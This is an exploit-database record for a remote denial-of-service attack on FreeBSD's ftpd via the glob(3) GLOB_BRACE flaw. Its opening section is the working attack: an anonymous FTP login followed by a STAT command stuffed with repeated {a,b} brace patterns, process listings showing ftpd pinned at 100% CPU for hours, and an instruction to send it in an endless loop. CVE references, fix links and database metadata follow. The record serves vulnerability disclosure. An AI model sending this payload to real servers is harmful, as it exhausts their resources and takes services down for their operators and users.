stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:
ftp 13034 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.96
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13035 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.89
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13036 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.73
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13046 0.0 0.4 10416 1952 ?? R 10:48PM 0:00.41
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13047 0.0 0.4 10416 1960 ?? R 10:48PM 0:00.42
ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root 13219 0.0 0.3 10032 1424 ?? R 10:52PM 0:00.00
/usr/libexec/ftpd -dDA
root 13225 0.0 0.3 10032 1428 ?? R 10:52PM 0:00.00
/usr/libexec/ftpd -dDA
root 13409 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00
/usr/libexec/ftpd -dDA
root 13410 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00
/usr/libexec/ftpd -dDA
...

=>Sending:
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

=>Result:
@ps:
ftp 1336 100.0 0.5 10416 2360 ?? R 11:15PM 600:39.95
ftpd: 127.0.0.1: anonymous/anonymous@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root 1 103 0 10416K 2360K RUN 600:53 100.00% ftpd

one request over 600m (~10h) execution time and 100% CPU usage. This
issue allow to create N ftpd processes with 100% CPU usage.

Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2

The funniest is that freebsd use GLOB_LIMIT in ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
if (strpbrk(whichf, "~{[*?") != NULL) {
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
freeglob = 1;
if (glob(whichf, flags, 0, &gl)) {
---

but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU
resource exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

only FreeBSD and GNU glibc are affected

--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233

--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve
problem with security ;)

--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632

Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
http://cxsecurity.com/issue/WLB-2011050004
http://cxsecurity.com/cveshow/CVE-2011-0418

More CWE-399 resource exhaustion examples:
http://cxsecurity.com/cwe/CWE-399

The regcomp implementation in the GNU C Library allows attackers to
cause a denial of service proftpd
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279

--- 5. Contact ---
Maksymilian Arciemowicz
max 4T cxsecurity.com
http://cxsecurity.com/
http://cxsec.org/

Trust: 1.0

sources: EXPLOIT-DB: 24450

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 24450

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 24450

TYPE

'ftpd' Remote Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 24450

CREDITS

Maksymilian Arciemowicz

Trust: 0.6

sources: EXPLOIT-DB: 24450

EXTERNAL IDS

db:	NVD	id:	CVE-2010-2632	Trust: 5.2
db:	NVD	id:	CVE-2010-4052	Trust: 4.8
db:	NVD	id:	CVE-2010-4051	Trust: 4.8
db:	NVD	id:	CVE-2011-0418	Trust: 4.7
db:	CERT/CC	id:	VU#912279	Trust: 3.8
db:	CXSECURITY	id:	WLB-2011050004	Trust: 3.4
db:	CXSECURITY	id:	WLB-2010100135	Trust: 3.4
db:	CXSECURITY	id:	WLB-2013020003	Trust: 2.2
db:	CXSECURITY	id:	WLB-2013010233	Trust: 2.2
db:	EXPLOIT-DB	id:	24450	Trust: 1.6
db:	CXSECURITY	id:	WLB-2011030145	Trust: 1.2
db:	JUNIPER	id:	JSA10612	Trust: 1.1
db:	NVD	id:	CVE-2011-3336	Trust: 1.0
db:	EDBNET	id:	78100	Trust: 0.6
db:	EDBNET	id:	46570	Trust: 0.6
db:	EDBNET	id:	75213	Trust: 0.6
db:	EDBNET	id:	63259	Trust: 0.6
db:	EDBNET	id:	75724	Trust: 0.6
db:	EDBNET	id:	81502	Trust: 0.6
db:	PACKETSTORM	id:	106589	Trust: 0.5
db:	SREASON	id:	7822	Trust: 0.5
db:	PACKETSTORM	id:	94556	Trust: 0.5
db:	PACKETSTORM	id:	120032	Trust: 0.5
db:	CXSECURITY	id:	WLB-2011010121	Trust: 0.5
db:	CXSECURITY	id:	WLB-2011110082	Trust: 0.5
db:	PACKETSTORM	id:	125725	Trust: 0.5
db:	PACKETSTORM	id:	97315	Trust: 0.5
db:	NVD	id:	CVE-2010-4754	Trust: 0.5
db:	NVD	id:	CVE-2010-4755	Trust: 0.5
db:	NVD	id:	CVE-2010-4756	Trust: 0.5
db:	PACKETSTORM	id:	101052	Trust: 0.5
db:	BID	id:	43819	Trust: 0.3
db:	BID	id:	47671	Trust: 0.3

REFERENCES

url:	https://www.intelligentexploit.com	Trust: 3.0
url:	https://nvd.nist.gov/vuln/detail/cve-2011-0418	Trust: 2.6
url:	https://nvd.nist.gov/vuln/detail/cve-2010-4052	Trust: 1.5
url:	https://nvd.nist.gov/vuln/detail/cve-2010-4051	Trust: 1.5
url:	https://nvd.nist.gov/vuln/detail/cve-2011-3336	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2010-2632	Trust: 1.0
url:	http://www.sun.com/software/solaris/	Trust: 0.6
url:	http://www.openbsd.org	Trust: 0.6
url:	http://www.netbsd.org/	Trust: 0.6
url:	https://www.exploit-db.com/exploits/24450/	Trust: 0.6
url:	http://support.avaya.com/css/p8/documents/100150582	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100127892	Trust: 0.3
url:	http://www.freebsd.org/	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html	Trust: 0.3
url:	http://www.gnu.org/software/libc/	Trust: 0.3
url:	http://securityreason.com/achievement_securityalert/89	Trust: 0.3
url:	http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c	Trust: 0.3
url:	http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29	Trust: 0.3
url:	http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h	Trust: 0.3
url:	http://www.securityreason.com/achievement_securityalert/97	Trust: 0.3

SOURCES

db:	BID	id:	43819
db:	BID	id:	47671
db:	PACKETSTORM	id:	106589
db:	PACKETSTORM	id:	94556
db:	PACKETSTORM	id:	120032
db:	PACKETSTORM	id:	125725
db:	PACKETSTORM	id:	97315
db:	PACKETSTORM	id:	101052
db:	EXPLOIT-DB	id:	24450
db:	EDBNET	id:	78100
db:	EDBNET	id:	46570
db:	EDBNET	id:	75213
db:	EDBNET	id:	63259
db:	EDBNET	id:	75724
db:	EDBNET	id:	81502

LAST UPDATE DATE

2024-03-21T15:10:28.620000+00:00

SOURCES UPDATE DATE

db:	BID	id:	43819	date:	2013-10-16T01:44:00
db:	BID	id:	47671	date:	2015-04-13T21:51:00

SOURCES RELEASE DATE

db:	BID	id:	43819	date:	2010-10-06T00:00:00
db:	BID	id:	47671	date:	2011-05-02T00:00:00
db:	PACKETSTORM	id:	106589	date:	2011-11-04T15:20:33
db:	PACKETSTORM	id:	94556	date:	2010-10-08T00:29:28
db:	PACKETSTORM	id:	120032	date:	2013-02-02T18:11:11
db:	PACKETSTORM	id:	125725	date:	2014-03-14T11:11:11
db:	PACKETSTORM	id:	97315	date:	2011-01-07T22:06:47
db:	PACKETSTORM	id:	101052	date:	2011-05-03T00:07:21
db:	EXPLOIT-DB	id:	24450	date:	2013-02-05T00:00:00
db:	EDBNET	id:	78100	date:	2014-03-14T00:00:00
db:	EDBNET	id:	46570	date:	2013-02-05T00:00:00
db:	EDBNET	id:	75213	date:	2013-02-01T00:00:00
db:	EDBNET	id:	63259	date:	2011-11-09T00:00:00
db:	EDBNET	id:	75724	date:	2013-04-11T00:00:00
db:	EDBNET	id:	81502	date:	2015-09-30T00:00:00

tag:	exploit	Trust: 3.0
tag:	denial of service	Trust: 1.5
tag:	proof of concept	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	overflow	Trust: 0.5
tag:	vulnerability	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE